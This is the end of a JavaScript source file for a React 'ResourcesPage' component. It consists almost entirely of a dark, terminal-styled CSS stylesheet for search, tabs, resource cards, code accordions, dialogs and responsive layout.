.rp-quick-top { display:flex; align-items:center; justify-content:space-between; gap:8px; margin-bottom:.45rem }
.rp-quick-title {
  font-family:'Syne',system-ui,sans-serif; font-size:14px; font-weight:700;
  letter-spacing:-.01em; color:#e2eaf3; margin-bottom:.3rem;
}
.rp-quick-desc { font-size:11px; line-height:1.75; color:#8faabf }

/* search */
.rp-search-wrap {
  position:relative; display:flex; align-items:center;
  background:#0c1118; border:1px solid #1a2738; border-radius:3px;
  max-width:420px; transition:border-color .18s;
}
.rp-search-wrap:focus-within { border-color:rgba(0,255,136,.35) }
.rp-search-icon { position:absolute; left:12px; color:#56657a; pointer-events:none }
.rp-search {
  width:100%; padding:8px 36px 8px 34px;
  background:transparent; border:none; outline:none;
  font-family:'Share Tech Mono',monospace; font-size:13px; color:#b8c4d0;
}
.rp-search::placeholder { color:#2e4a5a }
.rp-search-clear {
  position:absolute; right:10px; color:#56657a; background:none; border:none;
  cursor:pointer; font-size:16px; line-height:1; padding:0 2px;
  transition:color .18s;
}
.rp-search-clear:hover { color:#b8c4d0 }
.rp-search-info {
  display:flex; align-items:center; gap:6px;
  font-family:'Share Tech Mono',monospace; font-size:11px; color:#56657a;
  margin-bottom:1.2rem;
}

/* tabs */
.rp-tabs { display:flex; gap:6px; flex-wrap:wrap }
.rp-tab {
  display:inline-flex; align-items:center; gap:6px;
  font-family:'Share Tech Mono',monospace; font-size:11px; letter-spacing:.06em;
  padding:6px 14px; border-radius:2px;
  border:1px solid #1a2738; color:#56657a; background:transparent;
  cursor:pointer; transition:all .18s;
}
.rp-tab:hover { border-color:#243448; color:#b8c4d0 }
.rp-tab.is-active { border-color:rgba(0,255,136,.45)!important; color:#00ff88!important; background:rgba(0,255,136,.07)!important }

/* resource tag badge */
.rp-tag {
  font-family:'Share Tech Mono',monospace; font-size:9px; letter-spacing:.08em;
  text-transform:uppercase; padding:2px 6px; border-radius:2px; border:1px solid;
  line-height:1.4; flex-shrink:0;
}

/* sections */
.rp-sections { display:flex; flex-direction:column; gap:3.5rem }
.rp-section  { animation:rp-fadein .4s ease both }

.rp-sec-hdr   { display:flex; align-items:center; gap:9px; margin-bottom:1.3rem }
.rp-sec-title { font-family:'Syne',system-ui,sans-serif; font-size:15px; font-weight:700; color:#e2eaf3; letter-spacing:-.01em }
.rp-sec-count { font-family:'Share Tech Mono',monospace; font-size:10px; opacity:.55 }
.rp-sec-rule  { flex:1; height:1px; background:linear-gradient(90deg,#1a2738,transparent) }

/* grid */
.rp-grid-3 { display:grid; grid-template-columns:repeat(auto-fill,minmax(280px,1fr)); gap:1rem }

/* card */
.rp-card {
  position:relative; overflow:hidden;
  background:#0c1118; border:1px solid #1a2738; border-radius:3px;
  padding:1.4rem; display:flex; flex-direction:column; gap:.65rem;
  transition:border-color .2s, box-shadow .2s;
}
.rp-card:hover {
  border-color:rgba(var(--cat-rgb, 0,255,136), .3);
  box-shadow:0 4px 24px rgba(0,0,0,.3), inset 0 0 0 1px rgba(var(--cat-rgb, 0,255,136), .06);
}
.rp-card-top   { display:flex; justify-content:space-between; align-items:flex-start }
.rp-card-title { font-family:'Syne',system-ui,sans-serif; font-size:14px; font-weight:700; color:#e2eaf3; letter-spacing:-.01em; line-height:1.2 }
.rp-card-desc  { font-size:12px; color:#56657a; line-height:1.65; flex:1 }
.rp-card-link  {
  display:inline-flex; align-items:center; gap:5px;
  font-family:'Share Tech Mono',monospace; font-size:11px; letter-spacing:.04em;
  text-decoration:none; margin-top:.2rem; transition:opacity .18s;
}
.rp-card-link:hover { opacity:.7 }
.rp-card-bar   { position:absolute; bottom:0; left:0; right:0; height:2px; opacity:.3; transition:opacity .2s }
.rp-card:hover .rp-card-bar { opacity:.65 }
.rp-delete {
  background:none; border:none; cursor:pointer; padding:2px;
  color:#56657a; opacity:0; transition:all .18s;
}
.rp-card:hover .rp-delete { opacity:1 }
.rp-delete:hover { color:#ff4455 }

/* accordion */
.rp-accordion { display:flex; flex-direction:column; gap:6px }
.rp-acc-item  { background:#0c1118; border:1px solid #1a2738; border-radius:3px; overflow:hidden; transition:border-color .2s }
.rp-acc-item:hover { border-color:#243448 }

.rp-acc-trigger {
  width:100%; display:flex; justify-content:space-between; align-items:center;
  padding:1.1rem 1.4rem; background:none; border:none; cursor:pointer; text-align:left;
  transition:background .18s;
}
.rp-acc-trigger:hover { background:rgba(0,255,136,.025) }
.rp-acc-trigger-left { flex:1 }
.rp-acc-title  { font-family:'Syne',system-ui,sans-serif; font-size:14px; font-weight:700; color:#e2eaf3; letter-spacing:-.01em }
.rp-acc-desc   { font-size:12px; color:#56657a }
.rp-acc-arrow  { color:#56657a; transition:transform .2s; flex-shrink:0; margin-left:12px }

.rp-acc-body    { border-top:1px solid #1a2738 }
.rp-acc-toolbar {
  display:flex; justify-content:space-between; align-items:center;
  padding:7px 14px; background:#0a1520; border-bottom:1px solid #1a2738;
}
.rp-acc-tbl-label {
  display:flex; align-items:center;
  font-family:'Share Tech Mono',monospace; font-size:10px; color:#00ff88; opacity:.4; letter-spacing:.08em;
}
.rp-copy-btn {
  display:inline-flex; align-items:center; gap:4px;
  font-family:'Share Tech Mono',monospace; font-size:11px;
  color:#56657a; background:transparent; border:1px solid transparent;
  padding:3px 8px; border-radius:3px; cursor:pointer; transition:all .18s;
}
.rp-copy-btn:hover { color:#00ff88; border-color:rgba(0,255,136,.3); background:rgba(0,255,136,.05) }
.rp-copy-btn span  { line-height:1 }
.rp-acc-pre {
  margin:0; padding:1.1rem 1.4rem;
  font-family:'Share Tech Mono',monospace; font-size:12px; color:#8faabf;
  line-height:1.75; overflow-x:auto; background:#060a0d;
  white-space:pre-wrap; word-break:break-word;
}

/* empty state */
.rp-empty {
  display:flex; flex-direction:column; align-items:center; gap:10px;
  padding:4rem 0; color:#56657a;
  font-family:'Share Tech Mono',monospace; font-size:13px;
}
.rp-empty-icon { font-size:28px; opacity:.3; animation:rp-pulse 2s ease infinite }

/* skeleton */
.rp-skeleton { background:#0c1118; border:1px solid #1a2738; border-radius:3px; padding:1.4rem; display:flex; flex-direction:column; gap:10px }
.rp-sk {
  height:10px; border-radius:2px;
  background:linear-gradient(90deg,#1a2738 25%,#243448 50%,#1a2738 75%);
  background-size:200% 100%;
  animation:rp-shimmer 1.5s ease infinite;
}
.rp-sk-s { width:35% } .rp-sk-m { width:65% } .rp-sk-l { width:90% }

/* dialog */
.rp-dialog {
  background:#0c1118 !important; border:1px solid #1a2738 !important;
  border-radius:3px !important; max-width:560px;
  font-family:'JetBrains Mono',monospace;
}
.rp-dialog-title {
  display:flex; align-items:center; gap:8px;
  font-family:'Syne',system-ui,sans-serif; font-size:16px; font-weight:700; color:#e2eaf3;
}
.rp-form { display:flex; flex-direction:column; gap:.9rem; margin-top:.8rem }
.rp-g2   { display:grid; grid-template-columns:1fr 1fr; gap:1rem }
@media(max-width:480px) { .rp-g2{grid-template-columns:1fr} }

.rp-field  { display:flex; flex-direction:column; gap:6px }
.rp-fl     { display:flex; align-items:center; gap:5px; font-size:11px; text-transform:uppercase; letter-spacing:.08em; color:#56657a }
.rp-fl-arr { color:#00ff88; font-size:14px; line-height:1 }
.rp-in {
  width:100%; padding:9px 12px; background:#070a0e; border:1px solid #1a2738; border-radius:3px;
  font-family:'JetBrains Mono',monospace; font-size:13px; color:#b8c4d0;
  outline:none; transition:border-color .18s;
}
.rp-in::placeholder { color:#2e4a5a }
.rp-in:focus { border-color:rgba(0,255,136,.4) }
.rp-ta { resize:vertical; min-height:120px; line-height:1.7 }

.rp-sel-wrap { position:relative }
.rp-sel {
  width:100%; padding:9px 32px 9px 12px; background:#070a0e; border:1px solid #1a2738; border-radius:3px;
  font-family:'JetBrains Mono',monospace; font-size:13px; color:#b8c4d0;
  outline:none; cursor:pointer; -webkit-appearance:none; appearance:none; transition:border-color .18s;
}
.rp-sel:focus { border-color:rgba(0,255,136,.4) }
.rp-sel-wrap::after { content:"▾"; position:absolute; right:12px; top:50%; transform:translateY(-50%); color:#56657a; pointer-events:none; font-size:12px }

@media(max-width:768px) {
  .rp-hero-inner,.rp-body { padding-left:1.2rem; padding-right:1.2rem }
  .rp-stats { display:none }
  .rp-overview-grid { grid-template-columns:1fr }
  .rp-overview-stats { grid-template-columns:1fr }
  .rp-grid-3 { grid-template-columns:1fr }
  .rp-search-wrap { max-width:100% }
}
`;

export default ResourcesPage;
